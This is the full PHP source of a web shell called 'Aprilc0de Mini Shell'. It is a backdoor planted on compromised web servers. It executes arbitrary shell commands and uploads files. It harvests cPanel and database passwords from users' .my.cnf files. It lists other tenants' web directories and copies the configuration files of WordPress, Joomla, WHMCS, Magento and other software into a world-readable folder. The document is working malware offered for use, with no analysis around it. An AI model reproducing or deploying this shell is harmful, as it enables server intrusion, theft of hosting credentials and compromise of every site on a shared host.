• Aprilc0de Mini Shell •
'; exit; } if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) if(empty($pass)||(isset($_POST['pass'])&&(md5($_POST['pass'])==$pass)))$_SESSION[md5($_SERVER['HTTP_HOST'])] = true; else ustad(); if(isset($_GET['log'])&&($_GET['log']=='out')){ unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); } if($_GET['path']){ $path = $_GET['path']; } else { $path = getcwd(); } error_reporting(0); $dir = str_replace('\\','/',$path); $paths = explode('/',$dir); $uname = php_uname(); $os = PHP_OS; $ip = $_SERVER['SERVER_ADDR']; $id = getmyuid().'/'.getmygid(); $soft = $_SERVER['SERVER_SOFTWARE']; $ver = phpversion(); if(ini_get('safe_mode')==0){ $sm = "
OFF
"; } else { $sm = "ON"; } if(get_magic_quotes_gpc()=="1" or get_magic_quotes_gpc()=="on"){ $mq = "
OFF
"; } else { $mq = "ON"; } function exe($cmd){ if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')){ $buff = @shell_exec($cmd); return $buff; } } if(function_exists('mysql_connect')){ $mysql = "ON"; } else { $mysql = "
OFF
"; } if(function_exists('curl_version')) { $curl = "ON"; } else { $curl = "
OFF
"; } if(exe('wget --help')) { $wget = "ON"; } else { $wget = "
OFF
"; } if(exe('perl -h')) { $perl = "ON"; } else { $perl = "
OFF
"; } if($disablefunc=@ini_get("disable_functions")){ $df = "ON"; }else { $df = "
OFF
"; } echo "
₪ Aprilc0de Mini Shell
₪
UNAME :
$uname
"; echo "₪
IP :
$ip $soft $os $ver ( $id )
"; echo "₪
SAFEMOD :
$sm ‣
MAGIC :
$mq ‣
MYSQL :
$mysql ‣
DISFUNC :
$df ‣
CURL :
$curl ‣
WGET :
$wget
"; echo "₪
PATH :
"; foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '
‣
'; continue; } if($pat == '') continue; echo '
'.$pat.'
‣ '; } echo "
Upload
Jumper
Config
CpCrack
"; if(isset($_GET['cpcrack'])){ function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){ $ar0=explode($marqueurDebutLien, $text); $ar1=explode($marqueurFinLien, $ar0[$i]); return trim($ar1[0]); } echo '
'; echo "
"; $d0mains = @file('/etc/named.conf'); $domains = scandir("/var/named"); if ($domains or $d0mains) { $domains = scandir("/var/named"); if($domains) { echo '
Domain
User
Pass
>>
'; $count=1; $dc = 0; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")){ $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); $dirz = '/home/'.$owner['name'].'/.my.cnf'; $path = getcwd(); if (is_readable($dirz)) { copy($dirz, ''.$path.'/'.$owner['name'].'.txt'); $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt'); $password=entre2v2($p,'password="','"'); echo "
".$domain."
".$owner['name']."
".$password."
>>
"; $dc++; } } } echo '
'; $total = $dc; echo '
Total cPanel Found :
'.$total.'
'; echo '
'; }else{ $d0mains = @file('/etc/named.conf'); if($d0mains) { echo '
Domain
User
Pass
>>
'; $count=1; $dc = 0; $mck = array(); foreach($d0mains as $d0main){ if(@eregi('zone',$d0main)){ preg_match_all('#zone "(.*)"#',$d0main,$domain); flush(); if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0]; } } } $mck = array_unique($mck); $usr = array(); $dmn = array(); foreach($mck as $o) { $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o)); $usr[] = $infos['name']; $dmn[] = $o; } array_multisort($usr,$dmn); $dt = file('/etc/passwd'); $passwd = array(); foreach($dt as $d) { $r = explode(':',$d); if(strpos($r[5],'home')) { $passwd[$r[0]] = $r[5]; } } $l=0; $j=1; foreach($usr as $r) { $dirz = '/home/'.$r.'/.my.cnf'; $path = getcwd(); if (is_readable($dirz)) { copy($dirz, ''.$path.'/'.$r.'.txt'); $p=file_get_contents(''.$path.'/'.$r.'.txt'); $password=entre2v2($p,'password="','"'); echo "
'.$dmn[$j-1].'
'.$r."
".$password."
>>
"; $dc++; flush(); $l=$l?0:1; $j++; } } } echo '
'; $total = $dc; echo '
Total cPanel Found :
'.$total.'
'; echo ''; } }else{ echo "
ERROR :
/var/named or etc/named.conf Not Accessible!"; } exit; } if(isset($_GET['view'])){ echo "
".htmlentities(file_get_contents($_GET['path'].'/'.$_GET['filename']))."
"; exit; } if(isset($_GET['jumping'])){ ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('
Error: safe_mode = on
'); set_time_limit(0); @$passwd = fopen('/etc/passwd','r'); if (!$passwd) { die('
Error : coudn`t read /etc/passwd
'); } $pub = array(); $users = array(); $conf = array(); $i = 0; while(!feof($passwd)) { $str = fgets($passwd); if($i>35){ $pos = strpos($str,':'); $username = substr($str,0,$pos); $dirz = '/home/'.$username.'/public_html/'; if(($username != '')){ if(is_readable($dirz)){ array_push($users,$username); array_push($pub,$dirz); }}} $i++; } echo "
‣
Total :
".sizeof($users)."/".sizeof($pub)." User"; echo "
"; foreach($users as $user){ $path = "/home/$user/public_html/"; echo "
"; echo "•
$path
"; echo "
"; } exit; } // config by Indoxploit if(isset($_GET['config'])) { $etc = fopen("/etc/passwd", "r"); $idx = mkdir("aprilc0de", 0777); $isi_htc = "Options all\nRequire None\nSatisfy Any"; $htc = fopen("aprilc0de/.htaccess","w"); fwrite($htc, $isi_htc); while($passwd = fgets($etc)) { if($passwd == "" || !$etc) { echo "
Can't read /etc/passwd
"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach($user_config[1] as $user_idx){ $user_config_dir = "/home/$user_idx/public_html/"; if(is_readable($user_config_dir)) { $grab_config = array( "/home/$user_idx/.my.cnf" => "cpanel", "/home/$user_idx/.accesshash" => "WHM-accesshash", "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb", "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS", "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS", "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS", "/home/$user_idx/public_html/forum/config.php" => "phpBB", "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal", "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_idx/public_html/app/etc/local.xml" => "Magento", "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla", "/home/$user_idx/public_html/configuration.php" => "Joomla", "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress", "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress", "/home/$user_idx/public_html/wp-config.php" => "WordPress", "/home/$user_idx/public_html/admin/config.php" => "OpenCart", "/home/$user_idx/public_html/slconfig.php" => "Sitelok", "/home/$user_idx/public_html/application/config/database.php" => "Ellislab"); foreach($grab_config as $config => $nama_config){ $ambil_config = file_get_contents($config); if($ambil_config == ''){ } else { $file_config = fopen("aprilc0de/$user_idx-$nama_config.txt","w"); fputs($file_config,$ambil_config); }}} }}} $path = getcwd(); echo "‣
Done :
Click Here
"; exit; } // uploader if(isset($_GET['upload'])){ $path = $_GET['path']; echo '
'; if(isset($_REQUEST['ufile'])){ $ufile = $_POST['ufile']; } if(isset($_REQUEST['upload'])){ if($_POST['upload']){ if(@copy($_FILES['file']['tmp_name'],$path.'/'.$ufile)){ $size = filesize($ufile); echo ''; echo "‣
Sucess :
$ufile
"; } else { $size = filesize($ufile); echo ''; echo "‣
Gagal :
$ufile
"; }}} exit; } // scandir $files = scandir ($path); $direct = 0; foreach ($files as $out) { if(!is_dir("$path/$out") || $out == '.' || $out == '..') continue; echo '•
'.$out.'
'; } if(is_dir($path)){ foreach ($files as $out) { if(!is_file("$path/$out") || $out == '.' || $out == '..') continue; echo '•
'.$out.'
'; } } ?>
© Copyright 2018 UstadCage_48